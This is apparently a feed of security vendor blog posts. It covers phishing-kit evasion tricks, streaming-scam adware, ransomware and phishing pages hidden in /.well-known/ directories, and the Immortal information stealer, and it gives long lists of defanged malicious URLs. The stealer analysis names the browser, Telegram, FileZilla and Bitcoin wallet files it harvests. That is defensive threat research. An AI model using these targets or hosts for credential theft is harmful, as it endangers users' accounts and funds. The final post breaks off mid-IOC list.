geo-location Evasion and anti-analysis techniques 1. One-time access to the phishing page We have seen instances where phishing pages are accessible only once; upon re-visiting the page, it redirects the user to other websites. Below is one such campaign. Fig. 4: The victim's IP address is logged after checking if it is the first visit Fig. 5: File onetime.dat store log of all victims’ IP addresses Fig. 6: A victim's IP address is checked against the IP address in the file onetime.dat When a client visits phishing pages, such as the one discussed above, the IP address of the client gets logged in a file on the first visit. Each time a client visits such phishing pages, the client’s IP address gets checked against the list of IPs of clients that previously visited. Based on the results of that check, access to the phishing page is either granted, results in a “Page not found” message, or the client may be redirected to other websites. 2. Proxy check using online services Recently, many phishing kits have included a hardcoded list of blacklisted IP addresses, user-agents, and hostnames known to be used by security researchers and security companies. If the client attempts to connect with a blacklisted IP or user-agent, the phishing content will not be served. In some cases, along with the list of hardcoded IP addresses, the client’s IP is checked using some online services to see whether or not it is a proxy. Fig. 7: Source code using an online service to check the client's IP address for a proxy Fig. 8: Phishing page for the above-discussed campaign 3. Creating a new random name directory on each visit To make it more difficult to detect phishing campaigns, some campaigns create a new random name directory each time and the phishing page is hosted on this random directory. Below is the analysis of one such campaign. Fig. 9. Random name directory is shown on a phishing page Fig. 10: Newly created random name directory in a web server Fig. 11: Source code to generate a random name directory on each visit 4. Creating a new random name file on each visit A few phishing kits were found to be creating a new random name file on each visit to make it difficult to identify as a phishing site. Below is the analysis of one such phishing kit. Fig. 12: Random name file in URL is shown on a phishing page Fig. 13: Source code to generate a random name file on each visit 5. Random values for HTML attributes on each visit To make a phishing page hard to analyze and detect, the page values of HTML attributes are generated randomly upon each visit, as shown in the phishing campaign depicted below. Fig. 14: Randomly created values for HTML attributes Fig. 15: Source code to generate random values for HTML attributes Fig. 16: Phishing page related to the above-discussed campaign Conclusion Phishing attacks have been on the rise for a few years, but we’re seeing changes in attackers’ methodologies. As end-users become more careful about clicking suspicious links or opening unknown attachments, attackers have also upped the ante by evolving the way in which the phishing content is delivered, and they’re leveraging new tactics to make the phishing pages remain undetected for longer periods. Zscaler ThreatLabZ actively tracks new and evolving phishing campaigns and protects customers from these types of attacks. Categories: Security Posts ### 2019 NCAA Madness - Phishing and Streaming Scams Zscaler Research - 10 min 49 sec ago Last week, 64 of the best men's college basketball teams (68 if you count the First Four games) began their quest to cut down the nets in Minneapolis on April 8. Since the opening day of the NCAA men's college basketball tournament isn’t a national holiday, most fans were likely at work when the tournament tipped off. But, that shouldn’t stop them from seeing their alma mater try to upset a national powerhouse or watching a No. 12 seed knock off a No. 5 seed. Thankfully, fans can stream the whole tournament through the CBS Sports website. ZscalerTM ThreatLabZ noticed increased activity on sports and media sites during the games on the Zscaler cloud platform. However, IT managers or productivity hounds need not panic and pull the curtain on this viewing activity. There are very good reasons to consider allowing your diligent and fanatic workers a chance to cheer for their team (or just to earn some side hustle on the office bracket challenge pool). The most important reason being that blocking official streams sends users elsewhere to watch unofficial streams. These unofficial streams can lead to very real security incidents if left unchecked. Figure 1: Sports streaming media during NCAA Tournament​ for the past 10 days. Figure 1 shows just a portion of the traffic observed by the Zscaler Cloud that is generated by streaming services during the tournament. A steady flow can be seen as far as transaction count goes, but the highlight is the total volume of bytes, which peaks at 12.35 TB/per hour at one point. There is so much interest in the first round of the NCAA tournament that it is better to just allow streaming from legitimate sites if your internal infrastructure can support the load. Figure 2 shows the top official streaming sites that were visited across the Zscaler cloud in past week for NCAA games. Blocking this activity might lead a portion of the viewership looking for alternative sites with less-respectable online reputations. Figure 2: Top sites accessed for NCAA Tournament streaming. To see just how bad it can get out there, the ThreatLabZ team did an analysis of some attacks seen while searching for unofficial NCAA streams. What we found was a series of adware installers, phishing attacks and fraudulent security warnings leading to malicious browser plugins. Searching for "ncaa live stream free" in Google resulted in multiple phishing links in the top 50 results. Figure 3: An adware/phishing link in the top 50 Google search results. Adware/phishing scams One of the malicious streaming sites that we came across, streamcartel[.]org, is laced with adware on almost each of its pages. When the visitor clicks anywhere on the page or attempts to close the ad, a new tab opens up, prompting the user to install of a fake browser extension. Figure 4: Streamcartel[.]org's NBA schedule page displaying a fake plugin ad. According to information from Whois, sawlive[.]tv was registered one year ago during the NCAA tournament. It also uses other sporting events for enticing users to visit the site. One of the malicious ads from the site redirects to a Windows fake security warning page. Figure 5: Fake security warning ad/page from Microsoft Windows Firewall. The goal of this adware site or of any other is to make money by delivering unwanted ads to the user. In addition to that, this site also has a PayPal donation link asking visitors to donate money. Figure 6: PayPal donation page for owls0071@hotmail.com (in Dutch). Behind the scenes The site is embedded with player/content from sawlive[.]tv, which delivers more adware. These sites serve JavaScript obfuscated using JSF*ck, an encoding mechanism that uses only six characters to express any character. Here, 5,518 characters were sent as part of a response and, when deobfuscated, resulted into only 10 characters (“sawlive[.]tv”). Figure 7: JavaScript obfuscated using JSF*ck, served by sawlive[.]tv. This obfuscated JavaScript redirects to a request where the malicious server responds with more obfuscated JavaScript. Figure 8: Another cycle of obfuscated JavaScript served by the malicious site. Whenever the user attempts to click or close the ad, a new browser tab is opened with a request to http[:]//www[.]adexchangecloud[.]com/jump/next[.]php?r=44011, which prompts the user to install a fake browser plugin or scareware alerts or additional adware. One of the ads redirects to fake “Adobe Flash Player” update as shown below: Figure 8: Fake “Adobe Flash Player” update ad. The download/installer is flagged as malicious by our Zscaler Cloud Sandbox and also by VirusTotal. Figure 9: Zscaler Cloud Sandbox report for “Fake Flash Player”. Typo-squatted domains As part of every phishing/scam campaign that abuses current trends/keywords, there are typo-squatted domains for terms associated with the NCAA tournament. Here are a few domains that have been registered in the past 10 days: marchmadnessresults[.]com watchmarchmadnesslive[.]com betmarchmadness[.]fan marchmadness[.]mba marchmadness[.]rocks Conclusion The NCAA tournament is a massive draw for users around the nation. Taking a measured approach to how it is handled is critical for all businesses. The examples laid out should highlight the diversity of threats that attempt to exploit the excitement around the NCAA tournament. We encourage readers to exercise caution when doing searches or clicking on links related to streaming the tournament. Zscaler ThreatLabZ continuously monitors online activity worldwide to ensure that Zscaler customers are protected from threats, even if they become tricked into clicking a nefarious link. IoCs adexchangecloud[.]com adexchangemachine[.]com go[.]onclasrv[.]com gsafe[.]getawesome1[.]com inter1ads[.]com onclickmega[.]com sawlive[.]tv tgun[.]tv urldelivery[.]com - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Chris Mannon and Krishna Kona are Sr. Security Researchers at Zscaler. Categories: Security Posts ### Abuse of hidden “well-known” directory in HTTPS sites Zscaler Research - 10 min 49 sec ago WordPress and Joomla are among the most popular Content Management Systems (CMSs). They have also become popular for malicious actors, as cybercriminals target sites on these platforms for hacking and injecting malicious content. During the past few weeks, ThreatLabZ researchers have detected several WordPress and Joomla sites that were serving Shade/Troldesh ransomware, backdoors, redirectors, and a variety of phishing pages. The most well-known threats to CMS sites are the result of vulnerabilities introduced by plugins, themes, and extensions. In this blog, we are focusing on the Shade/Troldesh ransomware and phishing pages that we detected last month from several hundred compromised CMS sites. Shade ransomware has been quite active in the wild and we have been seeing a number of compromised WordPress and Joomla sites being used to spread the ransomware. The compromised WordPress sites we have seen are using versions 4.8.9 to 5.1.1 and they use SSL certificates issued by Automatic Certificate Management Environment (ACME)-driven certificate authorities, such as Let’s Encrypt, GlobalSign, cPanel, and DigiCert, among others. These compromised WordPress sites may have outdated CMS plugins/themes or server-side software which potentially could also be the reason for the compromise. Fig 1: Hits of Shade and phishing in detected CMS sites During the past month, our cloud blocked transactions for compromised WordPress and Joomla due to Shade ransomware payloads (13.6 percent) and phishing pages (27.6 percent), with the remaining blocks due to coinminers, adware, and malicious redirectors. We have been monitoring the compromised HTTPS sites for a few weeks and have noticed that attackers are favoring a well-known hidden directory present on the HTTPS website for storing and distributing Shade ransomware and phishing pages. The hidden /.well-known/ directory in a website is a URI prefix for well-known locations defined by IETF and commonly used to demonstrate ownership of a domain. The administrators of HTTPS websites that use ACME to manage SSL certificates place a unique token inside the /.well-known/acme-challenge/ or /.well-known/pki-validation/ directories to show the certificate authority (CA) that they control the domain. The CA will send them specific code for an HTML page that must be located in this particular directory. The CA will then scan for this code to validate the domain. The attackers use these locations to hide malware and phishing pages from the administrators. The tactic is effective because this directory is already present on most HTTPS sites and is hidden, which increases the life of the malicious/phishing content on the compromised site. The different types of threats that we found under the hidden directory in the past month are shown in the below image. Fig 2: Threats in hidden directory Fig 3: Shade ransomware vs. phishing pages in the hidden directory Case I: Shade/Troldesh ransomware under the hidden directory The graph below shows the Shade/Troldesh ransomware under the hidden directory that we detected last month. Fig 4: Shade/Troldesh ransomware hits over one month In the case of Shade/Troldesh ransomware, every compromised site has three types of files: HTML, ZIP, and EXE (.jpg), as shown below. Fig 5: Shade in hidden SSL validation directory inst.htm and thn.htm are HTML files that redirect to download ZIP files. reso.zip, rolf.zip, and stroi-invest.zip are ZIP files that contain the JavaScript file. msg.jpg and msges.jpg are EXE files that are the Shade ransomware. Fig 6: Shade Infection chain Troldesh is typically spread by malspam with a ZIP attachment or a link to an HTML redirector page, which downloads the ZIP file. The malspam pretends to be an order update coming from a Russian organization. An example of an email that has the link of the HTML redirector is shown below. Fig: 7 Malspam mail Fig 8: Redirector to download ZIP The ZIP file contains only the JavaScript file with a Russian name. The JavaScript is highly obfuscated and encrypted strings are decrypted at runtime by the below function. Fig 9: Decryption function After decryption, the JavaScript has the functionalities shown below. It tries to connect one of the two URLs, downloads the payload in %TEMP%, and executes it. Fig 10: Simplified JavaScript code The downloaded payload is the new variant of Shade/Troldesh ransomware, which has been around since 2014. It has two layers of packers: custom and UPX. After unpacking, it saves its configurations in “HKEY_LOCAL_MACHINE\SOFTWARE\System32\Configuration”. Fig 11: Shade configuration xcnt = Count of encrypted files xi = ID of infected machine xpk = RSA public key for encryption xVersion = Version of current Shade ransomware The command-and-control (C&C) server is a4ad4ip2xzclh6fd[.]onion. It drops a TOR client in %TEMP% to connect to its C&C server. For each file, the file content and file name are encrypted with AES-256 in CBC mode with two different keys. After encryption, it changes the filename to BASE64(AES(file_name)).ID_of_infected_machine.crypted000007. Fig 12: Encrypted files It drops a copy of itself in %ProgramData%\Windows\csrss.exe and makes a run entry for this copy with the name “BurnAware.” It drops README1.txt to README10.txt on the desktop and changes the wallpaper as shown below. Fig 13: Shade wallpaper README.txt has ransom note in both Russian and English languages. Fig 14: Shade ransom note Fig 15: Zscaler sandbox report for Shade/Troldesh ransomware Case II: Phishing pages under the hidden directory The graph below shows the different types of phishing pages under the hidden directory that we detected last month. Fig 16: Phishing hits over one month The phishing pages we have seen up to this point, which are hosted under SSL-validated hidden directories, are related to Office 365, Microsoft, DHL, Dropbox, Bank of America, Yahoo, Gmail, and others. Fig 17: OneDrive phishing page Fig 18: Yahoo phishing page Fig 19: DHL phishing page IOCs: aioshipping[.]com/.well-known/acme-challenge/msg.jpg yourcurrencyrates[.]com/.well-known/pki-validation/mxr.pdf rangtrangxinh[.]vn/.well-known/acme-challenge/msg.jpg judge[.]education/.well-known/pki-validation/ssj.jpg hoadaklak[.]com/.well-known/acme-challenge/ssj.jpg nguyenlinh[.]vn/.well-known/acme-challenge/msg.jpg rdsis[.]in/.well-known/pki-validation/msg.jpg khanlanhdaklak[.]com/.well-known/acme-challenge/ssj.jpg presse[.]schmutzki.de:80/.well-known/acme-challenge/messg.jpg aioshipping[.]com:80/.well-known/acme-challenge/msg.jpg yourcurrencyrates[.]com:80/.well-known/pki-validation/mxr.pdf vinhomeshalongxanh[.]xyz:80/.well-known/pki-validation/ssj.jpg titusrealestate[.]com.fj:80/.well-known/pki-validation/msg.jpg dichvucong[.]vn:80/.well-known/acme-challenge/msg.jpg myphamnarguerite[.]com:80/.well-known/acme-challenge/mxr.pdf minifyurl[.]net:80/.well-known/pki-validation/mxr.pdf judge[.]education:80/.well-known/pki-validation/ssj.jpg minifyurl[.]net/.well-known/pki-validation/mxr.pdf neccotweethearts[.]com:80/.well-known/pki-validation/mxr.pdf backuptest[.]tomward.org.uk:80/.well-known/pki-validation/ssj.jpg mobshop[.]schmutzki.de:80/.well-known/acme-challenge/messg.jpg neccotweethearts[.]com/.well-known/pki-validation/mxr.pdf myphamnarguerite[.]com/.well-known/acme-challenge/mxr.pdf khanlanhdaklak[.]com:80/.well-known/acme-challenge/ssj.jpg presse[.]schmutzki.de/.well-known/acme-challenge/messg.jpg mobshop[.]schmutzki.de/.well-known/acme-challenge/messg.jpg globalkabar[.]com/.well-known/pki-validation/sserv.jpg ereservices[.]com:80/.well-known/pki-validation/ssj.jpg dulichvietlao[.]vn:80/.well-known/acme-challenge/ssj.jpg backuptest[.]tomward.org.uk/.well-known/pki-validation/ssj.jpg mamycloth[.]store:80/.well-known/acme-challenge/msg.jpg business[.]driverclub.co:80/.well-known/pki-validation/msg.jpg vinhomeshalongxanh[.]xyz/.well-known/pki-validation/ssj.jpg dichvucong[.]vn/.well-known/acme-challenge/msg.jpg thuducland[.]net/.well-known/acme-challenge/sserv.jpg sahabathasyim[.]com/.well-known/acme-challenge/sserv.jpg rangtrangxinh[.]vn:80/.well-known/acme-challenge/msg.jpg lovecookingshop[.]com:80/.well-known/pki-validation/ssj.jpg ereservices[.]com/.well-known/pki-validation/ssj.jpg hoadaklak[.]com:80/.well-known/acme-challenge/ssj.jpg ceroshop[.]net/.well-known/acme-challenge/nba1.jpg thuducland[.]net:80/.well-known/acme-challenge/sserv.jpg lovecookingshop[.]com/.well-known/pki-validation/ssj.jpg entrenadorpersonalterrassa[.]com.es:80/.well-known/acme-challenge/mxr.pdf epifaniacr[.]net:80/.well-known/pki-validation/ssj.jpg titusrealestate[.]com.fj/.well-known/pki-validation/msg.jpg globalkabar[.]com:80/.well-known/pki-validation/sserv.jpg sahabathasyim[.]com:80/.well-known/acme-challenge/sserv.jpg dulichvietlao[.]vn/.well-known/acme-challenge/ssj.jpg argfoodfest[.]e-zero.com.ar:80/.well-known/pki-validation/ssj.jpg aa[-]publisher.com:80/.well-known/mxr.pdf duandojiland[-]sapphire.com:80/.well-known/pki-validation/ssj.jpg master[-]of-bitcoin.net/.well-known/pki-validation/messg.jpg ea[-]no7.net/.well-known/pki-validation/messg.jpg tropictowersfiji[.]com/.well-known/pki-validation/msg.jpg test[.]digimarkting.com/.well-known/pki-validation/msges.jpg tebarameatsfiji[.]com/.well-known/pki-validation/msg.jpg sbs[.]ipeary.com/.well-known/pki-validation/msges.jpg sbs[.]ipeary.com/.well-known/pki-validation/msg.jpg samyaksolution[.]co.in/.well-known/pki-validation/msges.jpg samyaksolution[.]co.in/.well-known/pki-validation/msg.jpg rosyheartsfiji[.]com/.well-known/pki-validation/pik.zip needcareers[.]com/.well-known/pki-validation/msges.jpg natristhub[.]club/.well-known/pki-validation/msges.jpg natristhub[.]club/.well-known/pki-validation/msg.jpg mytripland[.]com:80/.well-known/pki-validation/sserv.jpg learning[.]ipeary.com/.well-known/pki-validation/msg.jpg ipeari[.]com/.well-known/pki-validation/msg.jpg diennangmattroi[.]com/.well-known/pki-validation/msges.jpg diennangmattroi[.]com/.well-known/pki-validation/msg.jpg alonhadat24h[.]vn/.well-known/acme-challenge/update_2018_02.browser-components.zip 24bizhub[.]com/.well-known/pki-validation/msges.jpg 24bizhub[.]com/.well-known/pki-validation/msg.jpg thinkmonochrome[.]co.uk/.well-known/acme-challenge/messg.jpg test[.]digimarkting.com/.well-known/pki-validation/msg.jpg needcareers[.]com/.well-known/pki-validation/msg.jpg hanggiadungduc[.]vn/.well-known/acme-challenge/reso.zip designitpro[.]net/.well-known/acme-challenge/msg.jpg zanatika[.]com:80/.well-known/acme-challenge/ssj.jpg vina[.]fun:80/.well-known/acme-challenge/ssj.jpg nexusdental[.]com.mx/.well-known/acme-challenge/ssj.jpg neccotweethearts[.]com:80/.well-known/pki-validation/ssj.jpg jayc[-]productions.com:80/.well-known/acme-challenge/ssj.jpg indochine[-]mekong.com:80/.well-known/acme-challenge/ssj.jpg hexamersolution[.]com/.well-known/acme-challenge/msg.jpg hexacode[.]lk:80/.well-known/acme-challenge/ssj.jpg dongha[.]city:80/.well-known/acme-challenge/ssj.jpg domika[.]vn/.well-known/acme-challenge/msg.jpg coupanadda[.]in:80/.well-known/pki-validation/ssj.jpg choviahe[.]cf:80/.well-known/acme-challenge/ssj.jpg brace[-]dd.com/.well-known/pki-validation/msg.jpg angkaprediksi[.]fun/.well-known/acme-challenge/msg.jpg advancitinc[.]com/.well-known/pki-validation/msg.jpg vodai[.]bid/.well-known/pki-validation/ssj.jpg thucphammena[.]com/.well-known/acme-challenge/ssj.jpg thefoodgram[.]com/.well-known/acme-challenge/tehnikol.zip thefoodgram[.]com/.well-known/acme-challenge/stroi-industr.zip shopkimhuyen[.]com/.well-known/acme-challenge/msg.jpg shine[.]bmt.city/.well-known/acme-challenge/ssj.jpg sbs[.]ipeary.com/.well-known/pki-validation/stroi-industr.zip needcareers[.]com/.well-known/pki-validation/tehnikol.zip needcareers[.]com/.well-known/pki-validation/stroi-industr.zip maithanhduong[.]com/.well-known/pki-validation/pik.zip luongynhiem[.]com/.well-known/pki-validation/gkpik.zip lichxuansaigon[.]com:80/.well-known/acme-challenge/ssj.jpg kinder[-]express.de/.well-known/acme-challenge/reso.zip khannen[.]com.vn/.well-known/acme-challenge/ssj.jpg jayc[-]productions.com/.well-known/acme-challenge/ssj.jpg jambanswers[.]org/.well-known/pki-validation/ssj.jpg intercontinentalglobalservice[.]com:80/.well-known/pki-validation/ssj.jpg gurusexpo[.]com.ng/.well-known/pki-validation/ssj.jpg gotrungtuan[.]online/.well-known/acme-challenge/ssj.jpg goindelivery[.]com/.well-known/pki-validation/major.zip fernandoherrera[.]me:80/.well-known/acme-challenge/ssj.jpg diennangmattroi[.]com/.well-known/pki-validation/stroi-industr.zip canhooceangate[.]com/.well-known/acme-challenge/sserv.jpg bramptonpharmacy[.]ca/.well-known/acme-challenge/msg.jpg bolt[-]fast.com/.well-known/pki-validation/gkpik.zip bmt[.]today/.well-known/acme-challenge/ssj.jpg blog[.]ponta-fukui.com/.well-known/pki-validation/pik.zip bhartivaish[.]com:80/.well-known/acme-challenge/ssj.jpg attireup[.]com/.well-known/acme-challenge/tehnikol.zip attireup[.]com/.well-known/acme-challenge/stroi-industr.zip acreationevents[.]com/.well-known/acme-challenge/msg.jpg yeu82[.]com/.well-known/acme-challenge/ssj.jpg yeu81[.]com/.well-known/acme-challenge/ssj.jpg yeu49[.]com/.well-known/acme-challenge/ssj.jpg yeu48[.]com/.well-known/acme-challenge/ssj.jpg vuacacao[.]com/.well-known/acme-challenge/ssj.jpg vision[-]ex.de/.well-known/acme-challenge/reso.zip vinaykhatri[.]in/.well-known/acme-challenge/ssj.jpg vinaykhatri[.]in/.well-known/acme-challenge/mxr.pdf variantmag[.]com/.well-known/acme-challenge/sserv.jpg valentinesblues[.]com/.well-known/pki-validation/sserv.jpg uyencometics[.]bmt.city/.well-known/acme-challenge/ssj.jpg tysonfury[.]rocks/.well-known/acme-challenge/msg.jpg tulipremodeling[.]com/.well-known/acme-challenge/sserv.jpg tropictowersfiji[.]com/.well-known/pki-validation/pik.zip thesaturnring[.]com/.well-known/acme-challenge/mxr.pdf theotokis[.]gr/.well-known/pki-validation/mxr.pdf thefashionelan[.]com/.well-known/pki-validation/msg.jpg tanione[.]com:80/.well-known/acme-challenge/ssj.jpg tanione[.]com/.well-known/acme-challenge/ssj.jpg steeveriano[.]com/.well-known/pki-validation/msg.jpg singleparentaustralia[.]com.au/.well-known/pki-validation/reso.zip shafercharacter[.]org/.well-known/acme-challenge/messg.jpg service[.]baynuri.net/.well-known/acme-challenge/messg.jpg samyaksolution[.]co.in/.well-known/pki-validation/rolf.zip realman[.]work/.well-known/acme-challenge/reso.zip rarejewelry[.]net/.well-known/acme-challenge/mxr.pdf rarejewelry[.]net/.well-known/acme-challenge/messg.jpg qsongchihotel[.]com/.well-known/acme-challenge/ssj.jpg panama[.]driverclub.co/.well-known/pki-validation/pic.zip ngheve[.]com/.well-known/acme-challenge/ssj.jpg nfc[.]com.vn/.well-known/acme-challenge/msg.jpg next[-]vision.ro/.well-known/pki-validation/ssj.jpg newsnaija[.]ng/.well-known/pki-validation/ssj.jpg newsnaija[.]ng/.well-known/pki-validation/mxr.pdf neelshivamlaw[.]com/.well-known/pki-validation/pic.inform.zip neccotweethearts[.]com/.well-known/pki-validation/ssj.jpg navegacaolacet[.]com.br/.well-known/acme-challenge/msg.jpg mytripland[.]com/.well-known/pki-validation/ssj.jpg myschoolmarket[.]com.ng/.well-known/acme-challenge/ssj.jpg mskhangroup[.]com/.well-known/pki-validation/pic.zip mskhangroup[.]com/.well-known/pki-validation/msg.jpg morganbits[.]com/.well-known/acme-challenge/mxr.pdf mo7o[.]fun:80/.well-known/acme-challenge/mxr.pdf mitsubishidn[.]com.vn/.well-known/acme-challenge/sserv.jpg meliscar[.]com:80/.well-known/pki-validation/ssj.jpg meliscar[.]com/.well-known/pki-validation/ssj.jpg manhattan[.]dangcaphoanggia.com/.well-known/acme-challenge/mxr.pdf maithanhduong[.]com/.well-known/pki-validation/msg.jpg lichxuansaigon[.]com/.well-known/acme-challenge/ssj.jpg lemon[-]remodeling.com/.well-known/acme-challenge/sserv.jpg lastra[.]top/.well-known/pki-validation/msg.jpg laflamme[-]heli.com/.well-known/acme-challenge/ssj.jpg laflamme[-]heli.com/.well-known/acme-challenge/sserv.jpg kousen[.]fire-navi.jp/.well-known/pki-validation/msg.jpg jambanswers[.]org/.well-known/pki-validation/vseros.bank.zakaz.docx.zip integramultimedia[.]com.mx/.well-known/acme-challenge/ssj.jpg incgoin[.]com/.well-known/pki-validation/reso.zip hexacode[.]lk/.well-known/acme-challenge/ssj.jpg happysungroup[.]de/.well-known/pki-validation/ssj.jpg goindelivery[.]com/.well-known/pki-validation/reso.zip goindelivery[.]com/.well-known/pki-validation/msg.jpg goindelivery[.]com/.well-known/pki-validation/kia.zip gnb[.]uz/.well-known/pki-validation/ssj.jpg geecee[.]co.za/.well-known/pki-validation/msg.jpg geecee[.]co.za/.well-known/pki-validation/kia.zip gdn[.]segera.live/.well-known/pki-validation/sserv.jpg fijidirectoryonline[.]com/.well-known/pki-validation/msg.jpg fastimmo[.]fr/.well-known/acme-challenge/sserv.jpg ereservices[.]com/.well-known/pki-validation/sserv.jpg ede[.]coffee/.well-known/acme-challenge/ssj.jpg dongydaisinhduong[.]com/.well-known/acme-challenge/messg.jpg diota[-]ar.com:80/.well-known/acme-challenge/mxr.pdf diota[-]ar.com/.well-known/acme-challenge/mxr.pdf diamondking[.]co/.well-known/pki-validation/sserv.jpg dev01[.]europeanexperts.com/.well-known/pki-validation/messg.jpg designitpro[.]net/.well-known/acme-challenge/reso.zip damuoigiasi[.]com/.well-known/acme-challenge/ssj.jpg dailynow[.]vn/.well-known/acme-challenge/msg.jpg choviahe[.]cf/.well-known/acme-challenge/ssj.jpg cellulosic[.]logicalatdemo.co.in/.well-known/pki-validation/ssj.jpg business[.]driverclub.co/.well-known/pki-validation/msg.jpg bhartivaish[.]com/.well-known/acme-challenge/sserv.jpg bcspremier[.]ru/promo/well-known/images/background_sm.jpg bcspremier[.]ru/promo/well-known/images/background_lg.jpg atiqah[.]my/.well-known/pki-validation/sserv.jpg aanarehabcenter[.]com:80/.well-known/pki-validation/ssj.jpg aanarehabcenter[.]com/.well-known/pki-validation/ssj.jpg 24bizhub[.]com/.well-known/pki-validation/tehnikol.zip 24bizhub[.]com/.well-known/pki-validation/stroi-industr.zip ipeari[.]com/.well-known/pki-validation/msg.jpg ipeari[.]com/.well-known/pki-validation/reso.zip ipeari[.]com/.well-known/pki-validation/stroi-industr.zip ipeari[.]com/.well-known/pki-validation/stroi-invest.zip ipeari[.]com/.well-known/pki-validation/tehnikol.zip learning[.]ipeary.com/.well-known/pki-validation/msg.jpg learning[.]ipeary.com/.well-known/pki-validation/reso.zip learning[.]ipeary.com/.well-known/pki-validation/stroi-industr.zip learning[.]ipeary.com/.well-known/pki-validation/stroi-invest.zip learning[.]ipeary.com/.well-known/pki-validation/tehnikol.zip test[.]digimarkting.com/.well-known/pki-validation/msg.jpg test[.]digimarkting.com/.well-known/pki-validation/reso.zip test[.]digimarkting.com/.well-known/pki-validation/stroi-industr.zip test[.]digimarkting.com/.well-known/pki-validation/stroi-invest.zip test[.]digimarkting.com/.well-known/pki-validation/tehnikol.zip SBS[.]ipeary.com/.well-known/pki-validation/msg.jpg SBS[.]ipeary.com/.well-known/pki-validation/reso.zip SBS[.]ipeary.com/.well-known/pki-validation/stroi-industr.zip SBS[.]ipeary.com/.well-known/pki-validation/stroi-invest.zip SBS[.]ipeary.com/.well-known/pki-validation/tehnikol.zip singleparentaustralia[.]com.au/.well-known/pki-validation/msg.jpg singleparentaustralia[.]com.au/.well-known/pki-validation/reso.zip natristhub[.]club/.well-known/pki-validation/msg.jpg natristhub[.]club/.well-known/pki-validation/reso.zip natristhub[.]club/.well-known/pki-validation/stroi-industr.zip natristhub[.]club/.well-known/pki-validation/stroi-invest.zip natristhub[.]club/.well-known/pki-validation/tehnikol.zip natristhub[.]club/.well-known/pki-validation/tehnikol1.zip Categories: Security Posts ### Immortal information stealer Zscaler Research - 10 min 49 sec ago Recently, the Zscaler ThreatLabZ team came across new information-stealer malware called Immortal, which is written in .NET and designed to steal sensitive information from an infected machine. The Immortal stealer is sold on the dark web with different build-based subscriptions. This blog provides an analysis of the data Immortal steals from browsers, the files it steals (and the applications it steals from), and what it does with the stolen data. Immortal starts its infection by creating a directory with a random name in a temp folder. Next, it creates a password.log file in "\%Temp%\{Random_DirName}\password.log”. Immortal writes the malware name, author’s name, and telegram address of the author in a password.log file. Date: Current date and time “MM/dd/yyyy HH:mm:ss” Windows Username: Username HWID: MachineGuid System: Operating system name Browser info stealing Immortal steals data from 24 browsers. It steals stored credentials, cookies, credit card data, and autofill data from the targeted browsers. When the user saves a username and password in the targeted browser, it stores the data in a “Login Data” file in an SQLite database format, and the browser-stored cookie information in the “Cookies” file. It also stores autofill data, credit card data, and other web information in the “Web Data” file. Below are the file paths for those files: “\%AppData%\Local\{Browser}\User Data\Default\Login Data” “\%AppData%\Local\{Browser}\User Data\Default\Web Data” “\%AppData%\Local\{Browser}\User Data\Default\Cookies” List of targeted browsers: Chrome Yandex Orbitum Opera Amigo CentBrowser Torch Comodo Go! ChromePlus Uran BlackHawk CoolNovo AcWebBrowser Epic Browser Baidu Spark Rockmelt Sleipnir SRWare Iron Titan Browser Flock Vivaldi Sputnik Maxthon Credential stealing The malware fetches credentials from the “Login Data” file and stores them in the password.log file as per the format below: Path: ” \%Temp%\{Random_DirName}\password.log”. SiteUrl: Website URL Login: Username Password: Password Program: Targeted browser Cookie stealing Immortal fetches cookie data from the cookies file and stores it in {Browsername}_cookies.txt file. Path: “\%Temp%\{Random_DirName}\Cookies\{Browsername_cookies.txt}". The format is shown below. Credit card data Immortal fetches credit card data from the “Web Data” file and stores it in the {Browsername}_CC.txt file. Path: “\%AppData%\{Random_DirName}\CC\{Browsername_CC.txt}”. The format is shown below. Autofill data The autofill feature of a browser allows the user to store commonly entered information in web forms. This information might include username, email, password, address, and credit card information. So, when the user opens a web page, it will automatically fill in the information already saved by the browser. The autofill information is stored in the “Web Data” file. Immortal fetches autofill data from the “Web Data” file and stores it in the {Autofill}_CC.txt file. Path: “\%AppData%\{Random_DirName}\Autofill\{Browsername_Autofill.txt}”. The format is shown below. File stealing Immortal steals files from many different applications. The details are below. Minecraft launchers The malware steals user data files and sessions from Minecraft launcher applications. The malware copies those applications' files into “%Temp%\{Random_DirName}\Applications\{AppName}\”. The following is a list of the applications: MinecraftOnly McSkill LavaCraft MinecraftLauncher VimeWorld RedServer Steam The malware steals files for the Steam application. Steam is an application for playing, discussing, and creating games. The files stolen by Immortal are as follows: SSFN (2 files) VDF files from the config folder Config.vdf loginusers.vdf Telegram and Discord Immortal also steals session-related files from Telegram and Discord. Telegram is a cloud-based instant messaging and voice over IP service. Discord is the cross-platform voice and text chat application designed to help gamers talk to each other in real time. Immortal copies those files into “%Temp%\{Random_Name}\Applications\{AppName}\”. File Path: %AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\ %AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\map0 %AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\map1 %AppData%\discord\\Local Storage\\https_discordapp.com_0.localstorage FileZilla Immortal steals files that contain FileZilla credentials. FileZilla is a known FTP tool used for file transfer. The malware copies the below files into “\%Temp%\{Random_DirName}\FileZilla\”. \%AppData%\Filezilla\recentservers.xml \%AppData%\Filezilla\sitemanager.xml Bitcoin-Qt wallet Immortal steals wallet.dat files from Bitcoin-Qt, a free and open-source Bitcoin wallet software. Below is a screenshot of the code for fetching the wallet path from the registry. The malware copies the wallet.dat file in “%Temp%\{Random_DirName}\”. Desktop files Immortal also goes through every file in the desktop folder on the victim’s system. It steals extension files (listed below) and copies them into “%Temp%\{Random_DirName}\Files\”. Txt Log Doc Docx sql Screenshot & Webcam Immortal takes a screenshot of the desktop of the infected system and saves it in “\%AppData%\{Random_DirName}\desktop.jpg”. It also captures a webcam snapshot and saves in it “\%AppData%\{Random_DirName}\CamPicture.jpg”. Network communication The malware stores all the stolen data in the directory “\%Temp%\{Random_DirName}\”. After that, it compresses all the files in a ZIP archive and saves the compressed file in \%Temp%\{Random_filename}.zip. Further, it sends {Random_filename}.zip to its command-and-control server as shown below. It also deletes the “\%Temp%\{Random_DirName}\” before sending the ZIP file. User = User name Hwid = MachineGuid At the time of analysis, the command & control panel for this stealer was live. We found the Immortal stealer being advertised and sold with different build-based subscriptions. The following is a screenshot of a page that describes all of Immortal's functionality and cost per build. A per-post price for one build is$30. IOCs Md5: 1719ff4ff267ef598a1dcee1d5b68667 Downloading URL : www.appleidservice[.]jp/stealer/files/svhost.exe NetworkURL: 